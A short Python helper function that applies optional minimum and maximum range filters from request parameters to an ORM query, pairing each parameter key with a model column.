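def apply_range_filters(query, params, filter_range_fields):
    # Each entry pairs (min_param, max_param) request args with a model column.
    for (min_key, max_key), column in filter_range_fields:
        if params.get(min_key) is not None:
            query = query.filter(column >= params[min_key])
        if params.get(max_key) is not None:
            query = query.filter(column <= params[max_key])
    return query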